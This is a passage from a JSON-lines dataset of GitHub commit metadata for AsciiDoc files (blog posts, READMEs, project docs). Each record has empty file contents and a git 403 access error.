ch,awislowski\/elasticsearch,18098924759\/elasticsearch,vietlq\/elasticsearch,bawse\/elasticsearch,pablocastro\/elasticsearch,episerver\/elasticsearch,trangvh\/elasticsearch,F0lha\/elasticsearch,nezirus\/elasticsearch,petabytedata\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pranavraman\/elasticsearch,i-am-Nathan\/elasticsearch,naveenhooda2000\/elasticsearch","old_file":"docs\/plugins\/authors.asciidoc","new_file":"docs\/plugins\/authors.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60a3186d1daebd22d8fd798c78e4172ff6c9bcce","subject":"add short doc on android code signing","message":"add short doc on android code signing\n\nfixes #20\n","repos":"Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/Android_code_signing.adoc","new_file":"doc\/Android_code_signing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c3f0e3822ca7621e9cbbd945c07370e9066da786","subject":"Update 2011-03-10-Analyse-de-la-qualite-logicielle.adoc","message":"Update 2011-03-10-Analyse-de-la-qualite-logicielle.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-03-10-Analyse-de-la-qualite-logicielle.adoc","new_file":"_posts\/2011-03-10-Analyse-de-la-qualite-logicielle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfe5193a51763c581d36f283f46a1d28fb56627f","subject":"Update 2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","message":"Update 2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de4faa5fd1018220d956d83d253a0885a9719dc9","subject":"Add basic README","message":"Add basic README\n","repos":"miska\/octv,miska\/octv,miska\/octv","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miska\/octv.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"75879d926dbfb9f098dc7671e36402d5e247cac9","subject":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","message":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5deda56d6b41cd51805cc393d787402da4c3e224","subject":"Update 2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","message":"Update 2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","new_file":"_posts\/2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a0a27c05873e68b1fa73c69ba71cd6d134fc5ec","subject":"Create README.adoc","message":"Create README.adoc","repos":"juangon\/prototypes,aparnachaudhary\/prototypes","old_file":"dockerfiles\/PostgreSQL9.3\/README.adoc","new_file":"dockerfiles\/PostgreSQL9.3\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/prototypes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ada679a03242464e623dbbd83b28a1ca5782db5","subject":"Update 2015-11-25-TEST.adoc","message":"Update 2015-11-25-TEST.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-25-TEST.adoc","new_file":"_posts\/2015-11-25-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ec4250e2ae8a0b0dc3e1ec5c3dbbf4f65f88bcd","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"ziodave\/hydra-java,dschulten\/hydra-java,ceefour\/hydra-java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dschulten\/hydra-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1344cb5d0a347d3bfa5ed9775c317d156113e624","subject":"Remove HTML Tags","message":"Remove HTML Tags\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c9c6869fe1828b3dff4db5dbe33f774779a7948","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b0adb10d30a2506ef8e1fb97119f668ef8e374","subject":"Update 2017-02-05-Reviews-on-F-resources.adoc","message":"Update 2017-02-05-Reviews-on-F-resources.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2017-02-05-Reviews-on-F-resources.adoc","new_file":"_posts\/2017-02-05-Reviews-on-F-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e68fd3478ae8e8cb52e5f5e2b82d962cad36453","subject":"Update 2015-08-13-Welcome-on-board.adoc","message":"Update 2015-08-13-Welcome-on-board.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-08-13-Welcome-on-board.adoc","new_file":"_posts\/2015-08-13-Welcome-on-board.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a7ed5bbb5322b793a8a0a6bc701cd674dbde109","subject":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","message":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f17a474b6b312c24bf3693c5bcda51d8c59f65a","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9df62df4f56909c11e7daf220a4f92122daf95a5","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d380503b04c459d1958c0f52c0e54ed1545a1099","subject":"Create README.adoc","message":"Create README.adoc","repos":"nintaitrading-eu\/ledgerplot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nintaitrading-eu\/ledgerplot.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"cbc42c0410fb2df7a7fa5e0f761ae24e568a2b9d","subject":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","message":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","repos":"Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam","old_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"16400560f5f035a4dfb5cc2f3caa99cdbc1e0680","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f6792cdfbf1d90179e2d5c94ef9bf75735c8fc","subject":"adding AWS credentials","message":"adding AWS credentials\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8258d9687355477401d7ae88a69d9fa769f2199","subject":"Add CCR template","message":"Add CCR template\n\nThis template combines the best of the wiki process as well as\nthe PROJECT and EXPERIMENT documents, but removes those items\nthat are too onerous for a change control request. This also\ncomplies with the Paperwork Reduction Act of 1980.\n","repos":"lookout\/styleguides","old_file":"docs\/CCR.asciidoc","new_file":"docs\/CCR.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lookout\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fea47cfe878758bb8d2986ad5e2e1f8ce45bfa80","subject":"Update 2019-01-31-draft-embeded-math-formula.adoc","message":"Update 2019-01-31-draft-embeded-math-formula.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff91de475b4f35e987e0ff8b58712f23d805212c","subject":"Update index.adoc","message":"Update index.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a727e627467f047766278481ed26848d32a080a6","subject":"Update 2017-08-17-Serverless-Framework-Type-Script-1.adoc","message":"Update 2017-08-17-Serverless-Framework-Type-Script-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-1.adoc","new_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35fafc11322de94d0d129c17696301e06e1905d0","subject":"Update 2015-06-01-Es-geht-weiter.adoc","message":"Update 2015-06-01-Es-geht-weiter.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8178e0a186c6390a0dc44efdafb0b649fbb96706","subject":"Renamed '_posts\/2017-10-08-Privacy-Polocy.adoc' to '_posts\/2017-01-01-Privacy-Policy.adoc'","message":"Renamed '_posts\/2017-10-08-Privacy-Polocy.adoc' to '_posts\/2017-01-01-Privacy-Policy.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-01-01-Privacy-Policy.adoc","new_file":"_posts\/2017-01-01-Privacy-Policy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6434eb62ec72dc6313ffe65307a9ff35cb2238f","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e1113a9d946072747fe87f25ac8926d5f3a2ee5","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78ef4a908990548e83a29e16815aa1bd350aff54","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ede7f3fcf04c96b64061fb35f46ebdb4118e60ec","subject":"create post DON'T Buy The iPhone X","message":"create post DON'T Buy The iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-DONT-Buy-The-iPhone-X.adoc","new_file":"_posts\/2018-02-26-DONT-Buy-The-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ea833036b103ca43edd4286121cdf1287d4cf7d","subject":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","message":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2a9eb32c71545553ea11cb02c04132ee1fa1bb","subject":"Exc shortened","message":"Exc shortened\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70e9f1e04ed8beec58ef400f41f411eb1381fbfc","subject":"y2b create post Nikon P7700 Unboxing \\u0026 Overview","message":"y2b create post Nikon P7700 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-03-Nikon-P7700-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-03-Nikon-P7700-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f93c7afba4317f3af3c001809e99ba291b6f03","subject":"Update 2015-12-23-Python-Static-Instance-variable.adoc","message":"Update 2015-12-23-Python-Static-Instance-variable.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"399fdb5867090440411aa191cbdf6b32d4e30a0f","subject":"Decided to leave this for another time","message":"Decided to leave this for another time\n","repos":"dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook","old_file":"packer\/base-atomic\/README.adoc","new_file":"packer\/base-atomic\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dedickinson\/engineering-notebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9de065afc88c5e343ec70725c6707fd625a58a5","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdc847678df6267fddc2140b06a2708af3c89e3e","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a1b05ae217e467cad65a6cbc1804f601d6e13d0","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc765c46ff7db445a5e06c4be7b9c59b672ab2f8","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4200d58f162fadcb8f20846b43a032bf5c98ec5d","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1225a5118442d38a6e3e618d4c8077da5035f76f","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f0b3a00c89415e3596deac37beab2a3c2fe2e8c","subject":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","message":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4be26550e500f42b15cbd1263e8fe3b32ac6f667","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"431b48b1c74524f7b9d6477b5a58bf913fb1c079","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7a6c99934d38fb784e22d06e8287d32c52473f5","subject":"Update DS_Store-undefined.adoc","message":"Update DS_Store-undefined.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-undefined.adoc","new_file":"_posts\/DS_Store-undefined.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"740ebef188c45f5dfe53da20f949c7677c5e94ec","subject":"Add note for ugettext in OSIS","message":"Add note for ugettext in OSIS\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} 